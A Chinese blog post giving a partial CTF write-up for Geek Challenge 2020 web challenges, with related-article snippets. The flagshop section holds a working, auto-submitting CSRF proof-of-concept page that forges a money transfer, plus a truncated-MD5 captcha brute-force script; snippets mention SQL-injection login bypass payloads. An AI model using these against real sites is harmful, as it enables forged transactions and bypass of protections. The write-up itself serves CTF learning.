极客大挑战2020年部分wp

最新推荐文章于 2025-06-02 04:20:29 发布
最新推荐文章于 2025-06-02 04:20:29 发布
阅读量1.7k 收藏 7
点赞数 4
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46041723/article/details/109395968
本文围绕2020极客大挑战的Web题目展开,涵盖“朋友的学妹”“EZWWW”“刘壮的黑页”等多道题。解题过程涉及查看控制窗口、利用御剑扫后台、分析PHP代码、使用get和post参数、利用漏洞攻击、编写抓包页面、爆破MD5截断加密验证码等操作以获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2020极客大挑战部分wp

前言

2020极客大挑战开始了。又是一届自闭季。在变菜的路上一去不复返

web

一、朋友的学妹

打开题目题目
发现提示,然后查看控制窗口发现
发现
然后看到base64加密,解密后得到flag。

二、EZWWW

打开题目题目
发现提示网站已经备份,那么就直接御剑扫后台得到
御剑扫描结果
然后打开zip路径得到下载提示,打开打开压缩包
直接放弃文档里的flag。肯定假的。所以打开index.php,发现

<html>
 <head>
  <title>Lola's website1.0</title>
 </head>
 <body>
 <?php echo '<h1>welcome to my website</h1>'; ?>
 <?php echo '<p>i will never forget to backup my website......</p>'; ?>
 <?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
 </body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
    //this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

发现题目源码,然后按照源码意思,进行所给字符串的base64解码,然后post a=解码后的字符。就会得到flag。flag得到

三、刘壮的黑页

打开题目
题目
然后往下翻,发现php代码
php源码

<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
    echo $flag;
}

所以按照代码所说,get、post两个参数进去得到flag。得到flag

四、welcome

打开题目
题目
发现一串空白。然后就随便get了一个东西,但是发现题目提示还有第二种方法,就post了一个。

五、flagshop

听题目就是卖flag的了。打开注册进行登录。发现界面如下
成功的截图
钱包那里是成功之后的效果。商品类
当时好奇点了个今晚去你家吃饭卡一下子就没钱了,让我本就不富裕的生活更加的雪上加霜。
回归正题,在转账界面可以进行转账,然后就试了一下给自己转账效果
然后感觉就是在留言界面进行操作了。但是具体怎么操作不了解,后来请教了团队大佬,经过他的讲解之后了解了可操作的原理。
原理:在报告界面有一个提交报告内容,在这里提交了内容后,后台会进行点击一次的操作,不过经过实验发现是只会点击一次。也就是说,这个题目可以利用CSRF漏洞进行攻击,但是需要自己写一个页面让后台点击,接着会自动跳转到转账页面,让服务器以为是后台转账操作。
然后就是强烈介绍我的大表哥–brupsuit了。利用其自带功能,可以编写一个csrf攻击html网页
抓包

抓包页面是这样的,然后就csrf
页面源码
然后把源码copy一下,在本地创建一个html文档。名字随意。源码如下:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="target" value="qwasd" />
      <input type="hidden" name="money" value="1000000000000000000000000000000000000000000000000000000" />
      <input type="hidden" name="messages" value="123" />
      <input type="submit" value="Submit request" id="onclick_1" />
    </form>
    <script type="text/javascript">
      document.getElementById("onclick_1").click();
    </script>
  </body>
</html>

其中

 <script type="text/javascript">
      document.getElementById("onclick_1").click();
    </script>

这一段代码用来实现页面进入后自动点击的操作。
然后由于是要后台点击你的链接,所以不能放在本地,有条件的哥哥姐姐们可以放在自己的服务器上面,小弟比较菜,就在博客里放了一个链接。也达到了同样的效果。
然后就是提交报告
上面验证码初看一脸懵逼,再看两眼迷离的,所以就问了大佬之后知道了是MD5截断加密。大佬还慷慨的给了我一个脚本用来爆破的

#-*- coding: utf-8 -*-
#!/usr/bin/env/python
from multiprocessing.dummy import Pool as tp
import hashlib

knownMd5 = '6fb05'      #已知的md5明文
def md5(text):
    return hashlib.md5(str(text).encode('utf-8')).hexdigest()

def findCode(code):
    key = code.split(':')
    start = int(key[0])
    end = int(key[1])
    for code in range(start, end):
        if md5(code)[0:5] == knownMd5:
            print(code)
            break
list=[]
for i in range(3):    #这里的range(number)指爆破出多少结果停止
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = tp()    #使用多线程加快爆破速度
pool.map(findCode, list)
pool.close()
pool.join()

然后最后加上自己的链接以及爆破出来的验证码,标题随便写,提交成功就等着转账到账了。
效果
之后就是到账,购买flag。

[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020参加清华学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的数据安全比赛,这篇文章202010月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐家去阅读论文,且看且珍惜。
[极客挑战 2020]Greatphp
snowlyzz的博客
09-15 702
php 原生类的学习与姿势利用,
极客挑战2020wp
Atkx's Blog
11-29 1631
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
BUUCTF[极客挑战 2019]EasySQL 1题解
最新发布
2301_79896143的博客
06-02 1274
SQL注入基础题解 本文以"[极客挑战 2019]EasySQL"为例,解析了SQL注入的基本原理和解题过程。题目是一个采用GET请求的登录界面,通过输入测试发现存在SQL注入漏洞。文章详细分析了数字型和字符型注入的区别,指出该题属于字符型注入。解题采用"万能密码"方法,通过构造1' or '1'='1等payload绕过验证。最终获得flag{c245efae-9088-4dec-8c2e-5c34c73392e9},展示了初级SQL注入的类型判断和payload构造技巧。
2020极客挑战WEB部分WP
satasun的博客
11-23 1956
WriteUP Welcome 题目地址: http://49.234.224.119:8000/ 题目描述: 欢迎来到极客挑战! 访问题目链接,发现405报错。 百度了一下,发现是GET或者POST请求出问题了。拿Postman试一下: 看了一下需要POST上传一个roam1,roam2,这两个的值不能相等,哈希值要相等,好了,传入数组。 因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过~ 在phpinfo里面找找可以
备战CTF做题题解
weixin_40707492的博客
07-21 7001
备战CTF初期,没有什么经验,部分操作过程有借鉴
树莓派伴侣–Mate One
jakenzhu的博客
07-16 250
MateOne实现树莓派一键开关机
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
热门推荐
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
[极客挑战 2020]Greatphp 原生类绕过
qq_54929891的博客
05-10 1173
<?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== s.
2020极客挑战web部分wp
qidiandexiaowu
11-17 751
可能起点不同吧,对于萌新(我)来说确实是难了点。 web1 welcome 进去是个空白页面,以post方式提交数据,就会看到 <?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !isset($_POST['ro
极客挑战wp部分
weixin_45396639的博客
04-26 424
1.Esay Sql 输入万能密码 2.Http 首先查看源码,发现有一个链接 去那个链接看看 构造http头,Referer:https://www.Sycsecret.com 发送看看,根据提示改user-agent 继续发送,继续根据提示改http头,添加X-Forwarded-For:127.0.0.1 最后,得到flag 3.Secret File 去网页源码看看 去链接...
BUUCTF--[极客挑战 2020]Greatphp
qq_46263951的博客
08-11 1339
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[极客挑战 2020]Greatphp (php 内置类)
qq_62046696的博客
12-20 1518
闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。PHP7中,可以在echo时触发__toString,来构造XSS。
极客挑战2020_极客挑战颁奖典礼
weixin_39665762的博客
12-15 348
202012月1日晚,网络空间安全学院三叶草信息安全小组“极客挑战”颁奖典礼在4213教室成功举行。网络空间安全学院党委副书记林细俤、三叶草安全技术小组指导老师吴春旺莅临此次颁奖典礼。 首先,林细俤上台致辞,他对此次极客挑战的举办给予了充分的肯定,并赞扬了三叶草小组对此次活动的组织带头作用。随后,他对获得名次和奖励的队伍和个人进行了肯定和鼓励,希望他们能够再接再...
[极客挑战 2020]Greatphp1
alwtj的博客
09-02 1709
所以,我们可以通过PHP的原生类来进行绕过(Error 或者 Exception),这两个类中呢存在一个_toString()的方法属性,意思就是当这两个类的对面需要被转换成字符串的时候就会调用 _toString()函数,下半部分就是传入一个great的参数,对这个参数进行反序列化,所以我们目标就明确了,我们需要绕过这个强类型比较,之后在绕过正则表达,最后执行寻找flag的命令.php 来实现我们包含flag文件的效果,又因为正则表达过滤了php我们可以用
buuctf [极客挑战 2019]Secret File wp
03-14
### BUUCTF 极客挑战 2019 Secret File Writeup 解题思路 此题目属于文件包含漏洞(File Inclusion Vulnerability)类型的Web安全挑战。以下是详细的分析过程: #### 题目背景 通过F12查看网页源码,发现了隐藏...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值